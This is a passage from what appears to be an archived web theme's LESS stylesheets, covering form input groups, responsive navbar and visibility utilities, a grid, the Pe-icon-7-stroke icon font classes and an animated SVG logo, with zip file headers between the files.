    padding: 4px 5px;
    font-size: @baseFontSize;
    font-weight: normal;
    line-height: @baseLineHeight;
    text-align: center;
    text-shadow: 0 1px 0 @white;
    background-color: @grayLighter;
    border: 1px solid #ccc;
  }
  .add-on,
  .btn,
  .btn-group > .dropdown-toggle {
    display: inline-block;
    vertical-align: top;
    .border-radius(0);
  }
  .active {
    background-color: lighten(@green, 30);
    border-color: @green;
  }
}

.input-prepend {
  .add-on,
  .btn {
    margin-right: -1px;
  }
  .add-on:first-child,
  .btn:first-child {
    // FYI, `.btn:first-child` accounts for a button group that's prepended
    .border-radius(@inputBorderRadius 0 0 @inputBorderRadius);
  }
}

.input-append {
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .uneditable-input {
    .border-radius(@inputBorderRadius 0 0 @inputBorderRadius);
    + .btn-group .btn:last-child {
      .border-radius(0 @inputBorderRadius @inputBorderRadius 0);
    }
  }
  .add-on,
  .btn,
  .btn-group {
    margin-left: -1px;
  }
  .add-on:last-child,
  .btn:last-child,
  .btn-group:last-child > .dropdown-toggle {
    .border-radius(0 @inputBorderRadius @inputBorderRadius 0);
  }
}

// Remove all border-radius for inputs with both prepend and append
.input-prepend.input-append {
  input,
  select,
  .uneditable-input {
    .border-radius(0);
    + .btn-group .btn {
      .border-radius(0 @inputBorderRadius @inputBorderRadius 0);
    }
  }
  .add-on:first-child,
  .btn:first-child {
    margin-right: -1px;
    .border-radius(@inputBorderRadius 0 0 @inputBorderRadius);
  }
  .add-on:last-child,
  .btn:last-child {
    margin-left: -1px;
    .border-radius(0 @inputBorderRadius @inputBorderRadius 0);
  }
  .btn-group:first-child {
    margin-left: 0;
  }
}




// SEARCH FORM
// -----------

input.search-query {
  padding-right: 14px;
  padding-right: 4px \9;
  padding-left: 14px;
  padding-left: 4px \9; /* IE7-8 doesn't have border-radius, so don't indent the padding */
  margin-bottom: 0; // Remove the default margin on all inputs
  .border-radius(15px);
}

/* Allow for input prepend/append in search forms */
.form-search .input-append .search-query,
.form-search .input-prepend .search-query {
  .border-radius(0); // Override due to specificity
}
.form-search .input-append .search-query {
  .border-radius(14px 0 0 14px);
}
.form-search .input-append .btn {
  .border-radius(0 14px 14px 0);
}
.form-search .input-prepend .search-query {
  .border-radius(0 14px 14px 0);
}
.form-search .input-prepend .btn {
  .border-radius(14px 0 0 14px);
}




// HORIZONTAL & VERTICAL FORMS
// ---------------------------

// Common properties
// -----------------

.form-search,
.form-inline,
.form-horizontal {
  input,
  textarea,
  select,
  .help-inline,
  .uneditable-input,
  .input-prepend,
  .input-append {
    display: inline-block;
    .ie7-inline-block();
    margin-bottom: 0;
    vertical-align: middle;
  }
  // Re-hide hidden elements due to specifity
  .hide {
    display: none;
  }
}
.form-search label,
.form-inline label,
.form-search .btn-group,
.form-inline .btn-group {
  display: inline-block;
}
// Remove margin for input-prepend/-append
.form-search .input-append,
.form-inline .input-append,
.form-search .input-prepend,
.form-inline .input-prepend {
  margin-bottom: 0;
}
// Inline checkbox/radio labels (remove padding on left)
.form-search .radio,
.form-search .checkbox,
.form-inline .radio,
.form-inline .checkbox {
  padding-left: 0;
  margin-bottom: 0;
  vertical-align: middle;
}
// Remove float and margin, set to inline-block
.form-search .radio input[type="radio"],
.form-search .checkbox input[type="checkbox"],
.form-inline .radio input[type="radio"],
.form-inline .checkbox input[type="checkbox"] {
  float: left;
  margin-right: 3px;
  margin-left: 0;
}


// Margin to space out fieldsets
.control-group {
  margin-bottom: @baseLineHeight / 2;
}

// Legend collapses margin, so next element is responsible for spacing
legend + .control-group {
  margin-top: @baseLineHeight;
  -webkit-margin-top-collapse: separate;
}


// Horizontal-specific styles
  // --------------------------

.form-horizontal {
  // Increase spacing between groups
  .control-group {
    margin-bottom: @baseLineHeight;
    .clearfix();
  }
  // Float the labels left
  .control-label {
    float: left;
    width: @horizontalComponentOffset - 20;
    padding-top: 5px;
    text-align: right;
  }
  // Move over all input controls and content
  .controls {
    // Super jank IE7 fix to ensure the inputs in .input-append and input-prepend
    // don't inherit the margin of the parent, in this case .controls
    *display: inline-block;
    *padding-left: 20px;
    margin-left: @horizontalComponentOffset;
    *margin-left: 0;
    &:first-child {
      *padding-left: @horizontalComponentOffset;
    }
  }
  // Remove bottom margin on block level help text since that's accounted for on .control-group
  .help-block {
    margin-bottom: 0;
  }
  // And apply it only to .help-block instances that follow a form control
  input,
  select,
  textarea,
  .uneditable-input,
  .input-prepend,
  .input-append {
    + .help-block {
      margin-top: @baseLineHeight / 2;
    }
  }
  // Move over buttons in .form-actions to align with .controls
  .form-actions {
    padding-left: @horizontalComponentOffset;
  }
}

/*Fix for tooltips wrong positioning*/
.control-label .hasTooltip {
  display: inline-block;
}
PK!���BB*flex/less/legacy/responsive-utilities.lessnu&1i�//
// Responsive: Utility classes
// --------------------------------------------------


// IE10 Metro responsive
// Required for Windows 8 Metro split-screen snapping with IE10
// Source: http://timkadlec.com/2012/10/ie10-snap-mode-and-responsive-design/
@-ms-viewport{
  width: device-width;
}

// Hide from screenreaders and browsers
// Credit: HTML5 Boilerplate
.hidden {
  display: none;
  visibility: hidden;
}

// Visibility utilities

// For desktops
.visible-phone     { display: none !important; }
.visible-tablet    { display: none !important; }
.hidden-phone      { }
.hidden-tablet     { }
.hidden-desktop    { display: none !important; }
.visible-desktop   { display: inherit !important; }

// Tablets & small desktops only
@media (min-width: 768px) and (max-width: 979px) {
  // Hide everything else
  .hidden-desktop    { display: inherit !important; }
  .visible-desktop   { display: none !important ; }
  // Show
  .visible-tablet    { display: inherit !important; }
  // Hide
  .hidden-tablet     { display: none !important; }
}

// Phones only
@media (max-width: 767px) {
  // Hide everything else
  .hidden-desktop    { display: inherit !important; }
  .visible-desktop   { display: none !important; }
  // Show
  .visible-phone     { display: inherit !important; } // Use inherit to restore previous behavior
  // Hide
  .hidden-phone      { display: none !important; }
}

// Print utilities
.visible-print    { display: none !important; }
.hidden-print     { }

@media print {
  .visible-print  { display: inherit !important; }
  .hidden-print   { display: none !important; }
}
PK!�g�U��'flex/less/legacy/responsive-navbar.lessnu&1i�//
// Responsive: Navbar
// --------------------------------------------------


// TABLETS AND BELOW
// -----------------
@media (max-width: @navbarCollapseWidth) {

  // UNFIX THE TOPBAR
  // ----------------
  // Remove any padding from the body
  body {
    padding-top: 0;
  }
  // Unfix the navbars
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    position: static;
  }
  .navbar-fixed-top {
    margin-bottom: @baseLineHeight;
  }
  .navbar-fixed-bottom {
    margin-top: @baseLineHeight;
  }
  .navbar-fixed-top .navbar-inner,
  .navbar-fixed-bottom .navbar-inner {
    padding: 5px;
  }
  .navbar .container {
    width: auto;
    padding: 0;
  }
  // Account for brand name
  .navbar .brand {
    padding-left: 10px;
    padding-right: 10px;
    margin: 0 0 0 -5px;
  }

  // COLLAPSIBLE NAVBAR
  // ------------------
  // Nav collapse clears brand
  .nav-collapse {
    clear: both;
  }
  // Block-level the nav
  .nav-collapse .nav {
    float: none;
    margin: 0 0 (@baseLineHeight / 2);
  }
  .nav-collapse .nav > li {
    float: none;
  }
  .nav-collapse .nav > li > a {
    margin-bottom: 2px;
  }
  .nav-collapse .nav > .divider-vertical {
    display: none;
  }
  .nav-collapse .nav .nav-header {
    color: @navbarText;
    text-shadow: none;
  }
  // Nav and dropdown links in navbar
  .nav-collapse .nav > li > a,
  .nav-collapse .dropdown-menu a {
    padding: 9px 15px;
    font-weight: bold;
    color: @navbarLinkColor;
    .border-radius(3px);
  }
  // Buttons
  .nav-collapse .btn {
    padding: 4px 10px 4px;
    font-weight: normal;
    .border-radius(@baseBorderRadius);
  }
  .nav-collapse .dropdown-menu li + li a {
    margin-bottom: 2px;
  }
  .nav-collapse .nav > li > a:hover,
  .nav-collapse .nav > li > a:focus,
  .nav-collapse .dropdown-menu a:hover,
  .nav-collapse .dropdown-menu a:focus {
    background-color: @navbarBackground;
  }
  .navbar-inverse .nav-collapse .nav > li > a,
  .navbar-inverse .nav-collapse .dropdown-menu a {
    color: @navbarInverseLinkColor;
  }
  .navbar-inverse .nav-collapse .nav > li > a:hover,
  .navbar-inverse .nav-collapse .nav > li > a:focus,
  .navbar-inverse .nav-collapse .dropdown-menu a:hover,
  .navbar-inverse .nav-collapse .dropdown-menu a:focus {
    background-color: @navbarInverseBackground;
  }
  // Buttons in the navbar
  .nav-collapse.in .btn-group {
    margin-top: 5px;
    padding: 0;
  }
  // Dropdowns in the navbar
  .nav-collapse .dropdown-menu {
    position: static;
    top: auto;
    left: auto;
    float: none;
    display: none;
    max-width: none;
    margin: 0 15px;
    padding: 0;
    background-color: transparent;
    border: none;
    .border-radius(0);
    .box-shadow(none);
  }
  .nav-collapse .open > .dropdown-menu { 
    display: block; 
  }

  .nav-collapse .dropdown-menu:before,
  .nav-collapse .dropdown-menu:after {
    display: none;
  }
  .nav-collapse .dropdown-menu .divider {
    display: none;
  }
  .nav-collapse .nav > li > .dropdown-menu {
    &:before,
    &:after {
      display: none;
    }
  }
  // Forms in navbar
  .nav-collapse .navbar-form,
  .nav-collapse .navbar-search {
    float: none;
    padding: (@baseLineHeight / 2) 15px;
    margin: (@baseLineHeight / 2) 0;
    border-top: 1px solid @navbarBackground;
    border-bottom: 1px solid @navbarBackground;
    .box-shadow(~"inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.1)");
  }
  .navbar-inverse .nav-collapse .navbar-form,
  .navbar-inverse .nav-collapse .navbar-search {
    border-top-color: @navbarInverseBackground;
    border-bottom-color: @navbarInverseBackground;
  }
  // Pull right (secondary) nav content
  .navbar .nav-collapse .nav.pull-right {
    float: none;
    margin-left: 0;
  }
  // Hide everything in the navbar save .brand and toggle button */
  .nav-collapse,
  .nav-collapse.collapse {
    overflow: hidden;
    height: 0;
  }
  // Navbar button
  .navbar .btn-navbar {
    display: block;
  }

  // STATIC NAVBAR
  // -------------
  .navbar-static .navbar-inner {
    padding-left:  10px;
    padding-right: 10px;
  }


}


// DEFAULT DESKTOP
// ---------------

@media (min-width: @navbarCollapseDesktopWidth) {

  // Required to make the collapsing navbar work on regular desktops
  .nav-collapse.collapse {
    height: auto !important;
    overflow: visible !important;
  }

}
PK!�i���,flex/less/legacy/responsive-768px-979px.lessnu&1i�//
// Responsive: Tablet to desktop
// --------------------------------------------------


@media (min-width: 768px) and (max-width: 979px) {

  // Fixed grid
  #grid > .core(@gridColumnWidth768, @gridGutterWidth768);

  // Fluid grid
  #grid > .fluid(@fluidGridColumnWidth768, @fluidGridGutterWidth768);

  // Input grid
  #grid > .input(@gridColumnWidth768, @gridGutterWidth768);

  // No need to reset .thumbnails here since it's the same @gridGutterWidth

}
PK!�Ghhflex/less/legacy/grid.lessnu&1i�//
// Grid system
// --------------------------------------------------


// Fluid (940px)
#grid > .fluid(@fluidGridColumnWidth, @fluidGridGutterWidth);

// Reset utility classes due to specificity
[class*="span"].hide,
.row-fluid [class*="span"].hide {
  display: none;
}

[class*="span"].pull-right,
.row-fluid [class*="span"].pull-right {
  float: right;
}
PK!>`�c3c3flex/less/pe-icon.lessnu&1i�@font-face {
	font-family: 'peIcon7';
	src: url('../fonts/fonts/Pe-icon-7-stroke.eot?d7yf1v');
	src: url('../fonts/Pe-icon-7-stroke.eot?#iefixd7yf1v') format('embedded-opentype'),
		url('../fonts/Pe-icon-7-stroke.woff?d7yf1v') format('woff'),
		url('../fonts/Pe-icon-7-stroke.ttf?d7yf1v') format('truetype'),
		url('../fonts/Pe-icon-7-stroke.svg?d7yf1v#Pe-icon-7-stroke') format('svg');
	font-weight: normal;
	font-style: normal;
}


[class^="pe-7s-"], [class*=" pe-7s-"] {
	display: inline-block;
	font-family: 'peIcon7';
	speak: none;
	font-style: normal;
	font-weight: normal;
	font-variant: normal;
	text-transform: none;
	line-height: 1;

	/* Better Font Rendering =========== */
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}

.pe-7s-album:before {
	content: "\e6aa";
}
.pe-7s-arc:before {
	content: "\e6ab";
}
.pe-7s-back-2:before {
	content: "\e6ac";
}
.pe-7s-bandaid:before {
	content: "\e6ad";
}
.pe-7s-car:before {
	content: "\e6ae";
}
.pe-7s-diamond:before {
	content: "\e6af";
}
.pe-7s-door-lock:before {
	content: "\e6b0";
}
.pe-7s-eyedropper:before {
	content: "\e6b1";
}
.pe-7s-female:before {
	content: "\e6b2";
}
.pe-7s-gym:before {
	content: "\e6b3";
}
.pe-7s-hammer:before {
	content: "\e6b4";
}
.pe-7s-headphones:before {
	content: "\e6b5";
}
.pe-7s-helm:before {
	content: "\e6b6";
}
.pe-7s-hourglass:before {
	content: "\e6b7";
}
.pe-7s-leaf:before {
	content: "\e6b8";
}
.pe-7s-magic-wand:before {
	content: "\e6b9";
}
.pe-7s-male:before {
	content: "\e6ba";
}
.pe-7s-map-2:before {
	content: "\e6bb";
}
.pe-7s-next-2:before {
	content: "\e6bc";
}
.pe-7s-paint-bucket:before {
	content: "\e6bd";
}
.pe-7s-pendrive:before {
	content: "\e6be";
}
.pe-7s-photo:before {
	content: "\e6bf";
}
.pe-7s-piggy:before {
	content: "\e6c0";
}
.pe-7s-plugin:before {
	content: "\e6c1";
}
.pe-7s-refresh-2:before {
	content: "\e6c2";
}
.pe-7s-rocket:before {
	content: "\e6c3";
}
.pe-7s-settings:before {
	content: "\e6c4";
}
.pe-7s-shield:before {
	content: "\e6c5";
}
.pe-7s-smile:before {
	content: "\e6c6";
}
.pe-7s-usb:before {
	content: "\e6c7";
}
.pe-7s-vector:before {
	content: "\e6c8";
}
.pe-7s-wine:before {
	content: "\e6c9";
}
.pe-7s-cloud-upload:before {
	content: "\e68a";
}
.pe-7s-cash:before {
	content: "\e68c";
}
.pe-7s-close:before {
	content: "\e680";
}
.pe-7s-bluetooth:before {
	content: "\e68d";
}
.pe-7s-cloud-download:before {
	content: "\e68b";
}
.pe-7s-way:before {
	content: "\e68e";
}
.pe-7s-close-circle:before {
	content: "\e681";
}
.pe-7s-id:before {
	content: "\e68f";
}
.pe-7s-angle-up:before {
	content: "\e682";
}
.pe-7s-wristwatch:before {
	content: "\e690";
}
.pe-7s-angle-up-circle:before {
	content: "\e683";
}
.pe-7s-world:before {
	content: "\e691";
}
.pe-7s-angle-right:before {
	content: "\e684";
}
.pe-7s-volume:before {
	content: "\e692";
}
.pe-7s-angle-right-circle:before {
	content: "\e685";
}
.pe-7s-users:before {
	content: "\e693";
}
.pe-7s-angle-left:before {
	content: "\e686";
}
.pe-7s-user-female:before {
	content: "\e694";
}
.pe-7s-angle-left-circle:before {
	content: "\e687";
}
.pe-7s-up-arrow:before {
	content: "\e695";
}
.pe-7s-angle-down:before {
	content: "\e688";
}
.pe-7s-switch:before {
	content: "\e696";
}
.pe-7s-angle-down-circle:before {
	content: "\e689";
}
.pe-7s-scissors:before {
	content: "\e697";
}
.pe-7s-wallet:before {
	content: "\e600";
}
.pe-7s-safe:before {
	content: "\e698";
}
.pe-7s-volume2:before {
	content: "\e601";
}
.pe-7s-volume1:before {
	content: "\e602";
}
.pe-7s-voicemail:before {
	content: "\e603";
}
.pe-7s-video:before {
	content: "\e604";
}
.pe-7s-user:before {
	content: "\e605";
}
.pe-7s-upload:before {
	content: "\e606";
}
.pe-7s-unlock:before {
	content: "\e607";
}
.pe-7s-umbrella:before {
	content: "\e608";
}
.pe-7s-trash:before {
	content: "\e609";
}
.pe-7s-tools:before {
	content: "\e60a";
}
.pe-7s-timer:before {
	content: "\e60b";
}
.pe-7s-ticket:before {
	content: "\e60c";
}
.pe-7s-target:before {
	content: "\e60d";
}
.pe-7s-sun:before {
	content: "\e60e";
}
.pe-7s-study:before {
	content: "\e60f";
}
.pe-7s-stopwatch:before {
	content: "\e610";
}
.pe-7s-star:before {
	content: "\e611";
}
.pe-7s-speaker:before {
	content: "\e612";
}
.pe-7s-signal:before {
	content: "\e613";
}
.pe-7s-shuffle:before {
	content: "\e614";
}
.pe-7s-shopbag:before {
	content: "\e615";
}
.pe-7s-share:before {
	content: "\e616";
}
.pe-7s-server:before {
	content: "\e617";
}
.pe-7s-search:before {
	content: "\e618";
}
.pe-7s-film:before {
	content: "\e6a5";
}
.pe-7s-science:before {
	content: "\e619";
}
.pe-7s-disk:before {
	content: "\e6a6";
}
.pe-7s-ribbon:before {
	content: "\e61a";
}
.pe-7s-repeat:before {
	content: "\e61b";
}
.pe-7s-refresh:before {
	content: "\e61c";
}
.pe-7s-add-user:before {
	content: "\e6a9";
}
.pe-7s-refresh-cloud:before {
	content: "\e61d";
}
.pe-7s-paperclip:before {
	content: "\e69c";
}
.pe-7s-radio:before {
	content: "\e61e";
}
.pe-7s-note2:before {
	content: "\e69d";
}
.pe-7s-print:before {
	content: "\e61f";
}
.pe-7s-network:before {
	content: "\e69e";
}
.pe-7s-prev:before {
	content: "\e620";
}
.pe-7s-mute:before {
	content: "\e69f";
}
.pe-7s-power:before {
	content: "\e621";
}
.pe-7s-medal:before {
	content: "\e6a0";
}
.pe-7s-portfolio:before {
	content: "\e622";
}
.pe-7s-like2:before {
	content: "\e6a1";
}
.pe-7s-plus:before {
	content: "\e623";
}
.pe-7s-left-arrow:before {
	content: "\e6a2";
}
.pe-7s-play:before {
	content: "\e624";
}
.pe-7s-key:before {
	content: "\e6a3";
}
.pe-7s-plane:before {
	content: "\e625";
}
.pe-7s-joy:before {
	content: "\e6a4";
}
.pe-7s-photo-gallery:before {
	content: "\e626";
}
.pe-7s-pin:before {
	content: "\e69b";
}
.pe-7s-phone:before {
	content: "\e627";
}
.pe-7s-plug:before {
	content: "\e69a";
}
.pe-7s-pen:before {
	content: "\e628";
}
.pe-7s-right-arrow:before {
	content: "\e699";
}
.pe-7s-paper-plane:before {
	content: "\e629";
}
.pe-7s-delete-user:before {
	content: "\e6a7";
}
.pe-7s-paint:before {
	content: "\e62a";
}
.pe-7s-bottom-arrow:before {
	content: "\e6a8";
}
.pe-7s-notebook:before {
	content: "\e62b";
}
.pe-7s-note:before {
	content: "\e62c";
}
.pe-7s-next:before {
	content: "\e62d";
}
.pe-7s-news-paper:before {
	content: "\e62e";
}
.pe-7s-musiclist:before {
	content: "\e62f";
}
.pe-7s-music:before {
	content: "\e630";
}
.pe-7s-mouse:before {
	content: "\e631";
}
.pe-7s-more:before {
	content: "\e632";
}
.pe-7s-moon:before {
	content: "\e633";
}
.pe-7s-monitor:before {
	content: "\e634";
}
.pe-7s-micro:before {
	content: "\e635";
}
.pe-7s-menu:before {
	content: "\e636";
}
.pe-7s-map:before {
	content: "\e637";
}
.pe-7s-map-marker:before {
	content: "\e638";
}
.pe-7s-mail:before {
	content: "\e639";
}
.pe-7s-mail-open:before {
	content: "\e63a";
}
.pe-7s-mail-open-file:before {
	content: "\e63b";
}
.pe-7s-magnet:before {
	content: "\e63c";
}
.pe-7s-loop:before {
	content: "\e63d";
}
.pe-7s-look:before {
	content: "\e63e";
}
.pe-7s-lock:before {
	content: "\e63f";
}
.pe-7s-lintern:before {
	content: "\e640";
}
.pe-7s-link:before {
	content: "\e641";
}
.pe-7s-like:before {
	content: "\e642";
}
.pe-7s-light:before {
	content: "\e643";
}
.pe-7s-less:before {
	content: "\e644";
}
.pe-7s-keypad:before {
	content: "\e645";
}
.pe-7s-junk:before {
	content: "\e646";
}
.pe-7s-info:before {
	content: "\e647";
}
.pe-7s-home:before {
	content: "\e648";
}
.pe-7s-help2:before {
	content: "\e649";
}
.pe-7s-help1:before {
	content: "\e64a";
}
.pe-7s-graph3:before {
	content: "\e64b";
}
.pe-7s-graph2:before {
	content: "\e64c";
}
.pe-7s-graph1:before {
	content: "\e64d";
}
.pe-7s-graph:before {
	content: "\e64e";
}
.pe-7s-global:before {
	content: "\e64f";
}
.pe-7s-gleam:before {
	content: "\e650";
}
.pe-7s-glasses:before {
	content: "\e651";
}
.pe-7s-gift:before {
	content: "\e652";
}
.pe-7s-folder:before {
	content: "\e653";
}
.pe-7s-flag:before {
	content: "\e654";
}
.pe-7s-filter:before {
	content: "\e655";
}
.pe-7s-file:before {
	content: "\e656";
}
.pe-7s-expand1:before {
	content: "\e657";
}
.pe-7s-exapnd2:before {
	content: "\e658";
}
.pe-7s-edit:before {
	content: "\e659";
}
.pe-7s-drop:before {
	content: "\e65a";
}
.pe-7s-drawer:before {
	content: "\e65b";
}
.pe-7s-download:before {
	content: "\e65c";
}
.pe-7s-display2:before {
	content: "\e65d";
}
.pe-7s-display1:before {
	content: "\e65e";
}
.pe-7s-diskette:before {
	content: "\e65f";
}
.pe-7s-date:before {
	content: "\e660";
}
.pe-7s-cup:before {
	content: "\e661";
}
.pe-7s-culture:before {
	content: "\e662";
}
.pe-7s-crop:before {
	content: "\e663";
}
.pe-7s-credit:before {
	content: "\e664";
}
.pe-7s-copy-file:before {
	content: "\e665";
}
.pe-7s-config:before {
	content: "\e666";
}
.pe-7s-compass:before {
	content: "\e667";
}
.pe-7s-comment:before {
	content: "\e668";
}
.pe-7s-coffee:before {
	content: "\e669";
}
.pe-7s-cloud:before {
	content: "\e66a";
}
.pe-7s-clock:before {
	content: "\e66b";
}
.pe-7s-check:before {
	content: "\e66c";
}
.pe-7s-chat:before {
	content: "\e66d";
}
.pe-7s-cart:before {
	content: "\e66e";
}
.pe-7s-camera:before {
	content: "\e66f";
}
.pe-7s-call:before {
	content: "\e670";
}
.pe-7s-calculator:before {
	content: "\e671";
}
.pe-7s-browser:before {
	content: "\e672";
}
.pe-7s-box2:before {
	content: "\e673";
}
.pe-7s-box1:before {
	content: "\e674";
}
.pe-7s-bookmarks:before {
	content: "\e675";
}
.pe-7s-bicycle:before {
	content: "\e676";
}
.pe-7s-bell:before {
	content: "\e677";
}
.pe-7s-battery:before {
	content: "\e678";
}
.pe-7s-ball:before {
	content: "\e679";
}
.pe-7s-back:before {
	content: "\e67a";
}
.pe-7s-attention:before {
	content: "\e67b";
}
.pe-7s-anchor:before {
	content: "\e67c";
}
.pe-7s-albums:before {
	content: "\e67d";
}
.pe-7s-alarm:before {
	content: "\e67e";
}
.pe-7s-airplay:before {
	content: "\e67f";
}


/* HELPER CLASS 
 * -------------------------- */

/* FA based classes */

/* makes the font 33% larger relative to the icon container */
.pe-lg {
  font-size: 1.3333333333333333em;
  line-height: 0.75em;
  vertical-align: -15%;
}
.pe-2x {
  font-size: 2em;
}
.pe-3x {
  font-size: 3em;
}
.pe-4x {
  font-size: 4em;
}
.pe-5x {
  font-size: 5em;
}
.pe-fw {
  width: 1.2857142857142858em;
  text-align: center;
}
.pe-ul {
  padding-left: 0;
  margin-left: 2.142857142857143em;
  list-style-type: none;
}
.pe-ul > li {
  position: relative;
}
.pe-li {
  position: absolute;
  left: -2.142857142857143em;
  width: 2.142857142857143em;
  top: 0.14285714285714285em;
  text-align: center;
}
.pe-li.pe-lg {
  left: -1.8571428571428572em;
}
.pe-border {
  padding: .2em .25em .15em;
  border: solid 0.08em #eeeeee;
  border-radius: .1em;
}
.pull-right {
  float: right;
}
.pull-left {
  float: left;
}
.pe.pull-left {
  margin-right: .3em;
}
.pe.pull-right {
  margin-left: .3em;
}
.pe-spin {
  -webkit-animation: spin 2s infinite linear;
  -moz-animation: spin 2s infinite linear;
  -o-animation: spin 2s infinite linear;
  animation: spin 2s infinite linear;
}
@-moz-keyframes spin {
  0% {
    -moz-transform: rotate(0deg);
  }
  100% {
    -moz-transform: rotate(359deg);
  }
}
@-webkit-keyframes spin {
  0% {
    -webkit-transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(359deg);
  }
}
@-o-keyframes spin {
  0% {
    -o-transform: rotate(0deg);
  }
  100% {
    -o-transform: rotate(359deg);
  }
}
@keyframes spin {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(359deg);
  }
}
.pe-rotate-90 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=1);
  -webkit-transform: rotate(90deg);
  -moz-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  -o-transform: rotate(90deg);
  transform: rotate(90deg);
}
.pe-rotate-180 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=2);
  -webkit-transform: rotate(180deg);
  -moz-transform: rotate(180deg);
  -ms-transform: rotate(180deg);
  -o-transform: rotate(180deg);
  transform: rotate(180deg);
}
.pe-rotate-270 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=3);
  -webkit-transform: rotate(270deg);
  -moz-transform: rotate(270deg);
  -ms-transform: rotate(270deg);
  -o-transform: rotate(270deg);
  transform: rotate(270deg);
}
.pe-flip-horizontal {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1);
  -webkit-transform: scale(-1, 1);
  -moz-transform: scale(-1, 1);
  -ms-transform: scale(-1, 1);
  -o-transform: scale(-1, 1);
  transform: scale(-1, 1);
}
.pe-flip-vertical {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1);
  -webkit-transform: scale(1, -1);
  -moz-transform: scale(1, -1);
  -ms-transform: scale(1, -1);
  -o-transform: scale(1, -1);
  transform: scale(1, -1);
}
.pe-stack {
  position: relative;
  display: inline-block;
  width: 2em;
  height: 2em;
  line-height: 2em;
  vertical-align: middle;
}
.pe-stack-1x,
.pe-stack-2x {
  position: absolute;
  left: 0;
  width: 100%;
  text-align: center;
}
.pe-stack-1x {
  line-height: inherit;
}
.pe-stack-2x {
  font-size: 2em;
}
.pe-inverse {
  color: #ffffff;
}

/* Custom classes / mods - PIXEDEN */
.pe-va {
  vertical-align: middle;
}

.pe-border {
  border: solid 0.08em #eaeaea;
}

[class^="pe-7s-"], [class*=" pe-7s-"] {
  display: inline-block;
}
PK!cQ��/�/flex/less/svg-logo.lessnu&1i�

svg {
	/* light style */
	&.flex-logo-light {
			
			margin: 0 auto;
		  
			g#Background {
				path#flex_rectangle_fill {
					opacity: 0;
					fill: transparent;
					stroke-dasharray: 1200;
					stroke-dashoffset: 1200;
					animation-name: fade-in;
					animation-duration: 0.5s;
					animation-delay: 3s;
					stroke-width: 0;
					animation-name: fade-in;
					animation-fill-mode: forwards;
					animation-iteration-count: 1;
					animation-timing-function: linear;
				}
				path#flex_rectangle {
				  stroke: fade(white, 70%);
				  stroke-width: 7;
				  stroke-dasharray: 2800;
				  stroke-dashoffset: 2800;
				  opacity: 1;
				  animation-duration: 2.3s;
				  animation-delay: 1s;
				  animation-fill-mode: forwards;
				  animation-iteration-count: 1;
				  animation-name: show;
				  animation-timing-function: linear;
				}
			}
			
			g#flex_logo  {
				polygon {
					opacity:0;
					stroke-width: 1;
					animation-duration: 0.7s;
					animation-delay: 2.5s;
					animation-fill-mode: forwards;
					animation-iteration-count: 1;
					animation-name: gradient_fade;
					animation-timing-function: linear;
					
					&#gradient_1 {
				   		fill:fade(white, 80%);
					}
					&#gradient_2 {
						fill:fade(white, 92%);
					}
				}
			
				#logo_top_bckg {
					opacity:0;
					stroke-width: 1;
					animation-duration: 0.7s;
					animation-delay: 2.5s;
					animation-fill-mode: forwards;
					animation-iteration-count: 1;
					animation-name: gradient_fade;
					animation-timing-function: linear;
				}
				
				path {
				  stroke-width: 7;
				  stroke: fade(white, 70%);
				  opacity: 1;
				  stroke-dasharray: 1500;
				  stroke-dashoffset: 1500;
				  animation-duration: 2s;
				  animation-delay: 1s;
				  animation-fill-mode: forwards;
				  animation-iteration-count: 1;
				  animation-name: gradient_fade;
				  animation-timing-function: linear;
				  
				  
					&#logo_top {
					  stroke-width: 7;
					  stroke: fade(white, 70%);
					  stroke-dasharray: 2000;
					  stroke-dashoffset: 2000;
					  animation-duration: 2.5s;
					  animation-delay: 0.6s;
					}
					&#logo_main1 {
					  stroke-dasharray: 1500;
					  stroke-dashoffset: 1500;
					  animation-duration: 3s;
					  animation-delay: 1.6s;
					}
					&#logo_main2 {
					  stroke-dasharray: 1500;
					  stroke-dashoffset: 1500;
					  animation-duration: 3s;
					  animation-delay: 2s;
					}
	
				}
			}
			
			g#flex {
				path {
					stroke-width: 12;
					stroke: fade(white, 70%);
					animation-fill-mode: forwards;
					animation-iteration-count: 1;
					animation-name: draw;
					animation-timing-function: linear;
					
					&#f_top {
						stroke-width: 12;
						stroke-dasharray: 700;
						stroke-dashoffset: 700;
						animation-duration: 2s;
						animation-delay: 3s;
					}
					
					&#f {
						stroke-dasharray: 2810;
						stroke-dashoffset: 2810;
						animation-duration: 5s;
						animation-delay: 4s;
					}
					
					&#l {
						stroke-dasharray: 900;
						stroke-dashoffset: 900;
						animation-duration: 1.5s;
						animation-delay: 4.7s;
					}
					&#e {
						stroke-dasharray: 1500;
						stroke-dashoffset: 1500;
						animation-duration: 2s;
						animation-delay: 5s;
					}
					&#x {
						stroke-dasharray: 1500;
						stroke-dashoffset: 1500;
						animation-duration: 2s;
						animation-delay: 5.4s;
					}
					
				}
			}
			
		g#flex_after {
			path {
			  stroke-width:0;
			  opacity:0;
			  fill: transparent;
			  animation-duration: 0.8s;
			  animation-delay: 7s;
			  animation-fill-mode: forwards;
			  animation-iteration-count: 1;
			  animation-name: flex_after_fade_light;
			  animation-timing-function: linear;
			  
			  &#f_top {
				  fill: transparent;
				  animation-duration: 1s;
				  animation-delay: 8s;
				  animation-fill-mode: forwards;
				  animation-iteration-count: 2;
				  animation-name: flex_after_f_top;
				  animation-timing-function: ease-in-out;
				}
			}
		}
		/* delayed 2 sec */
		&.delayed {
			
			g#Background {
				path#flex_rectangle_fill {
					animation-duration: 0.5s;
					animation-delay: 5s;
					stroke-width: 0;
				}
				path#flex_rectangle {
				  stroke-width: 7;
				  animation-duration: 2.3s;
